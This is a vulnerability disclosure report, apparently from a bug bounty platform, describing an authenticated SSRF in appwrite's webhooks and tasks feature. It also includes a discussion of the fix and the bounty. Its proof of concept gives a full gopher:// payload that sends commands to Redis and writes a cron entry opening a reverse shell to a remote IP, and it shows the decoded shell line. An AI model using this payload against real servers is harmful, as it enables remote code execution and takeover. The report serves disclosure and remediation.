Server-Side Request Forgery (SSRF) in appwrite/appwrite
Reported on
Oct 3rd 2021
Description
An authenticated SSRF vulnerability exists in appwrite's webhooks / tasks feature. The gopher:// protocol can be used to cause code execution on the Redis server that comes along with appwrite. The attacker must know the IP address of the redis-server which can be done by creating multiple webhooks in the 172..0. range.
Proof of Concept
Use the following payload as a webhook:
gopher://[REDIS-SERVER-IP]:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2463%0D%0A%0A%0A%2A/1%20%2A%20%2A%20%2A%20%2A%20bash%20-c%20%22sh%20-i%20%3E%26%20/dev/tcp/10.0.2.4/1234%200%3E%261%22%0A%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%245%0D%0A/data%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%244%0D%0Aroot%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A
When webhook is triggered:
This causes the following to be written in /data/root of the redis server:
*/1 * * * * bash -c "sh -i >& /dev/tcp/10.0.2.4/1234 0>&1
Impact
As of writing, I am only able to execute Redis commands and cause arbitrary file writes on the Redis server.
Recommended Fix
Block the gopher:// protocol
Occurrences
projects.php L1199-L1266
No protocol validation (Update task)
projects.php L764-L816
No protocol validation (Update webhook)
projects.php L637-L698
No protocol validation (Create webhook)
projects.php L1053-L1132
No protocol validation (Create task)
Hi @admin the email in in the security.md repository. Also I think there's a bug with the disclosure bounty
@haxatron - could you explain what the issue is with the bounty?
Originally it was 212.5 but when I updated the report it is 187.5. I think there may be some error in calculation when the report reaches the limit
@haxatron - we have identified the bug and will work on resolving this as soon as possible. In the meantime, I have bumped 👊 your bounties back up again.
Fixes proposed: https://github.com/Haxatron/appwrite/commit/682198c14849105c2dcedf7fd93aeca259efe350
@admin I can't seem to select the correct branch for the fix above. The security-fix branch does not show up for me
@haxatron - thanks for the heads up here! We do not currently have pagination of branches on the dropdown, and so will get this sorted out today for you! Once this has been deployed, you will be able to select your branch. I will keep you notified here! 🎊
Thanks! I am a noob at GitHub lol. So this is my first time hearing about pagination.
Oops i now think you meant that there are too many branches and so huntr cannot load them all. In that case, ill modify the fix in alphabetical order and that way I can select it.
The fix is deploying now, which will allow you to select any branch. Currently, some are just missing.
Use the following payload as a webhook:
gopher://[REDIS-SERVER-IP]:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2463%0D%0A%0A%0AWRITTEN%0A%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%245%0D%0A/data%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%244%0D%0Aroot%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A
When webhook is triggered:
This causes the following to be written in /data/root file of the redis server:
WRITTEN
From my understanding of the project, Appwrite requires HTTP requests to be made to internal IP address ranges, hence the submitted patch fix only validates the protocol used for webhooks / tasks against a whitelist (http, https).
To prevent any interaction with the redis-server via the gopher protocol
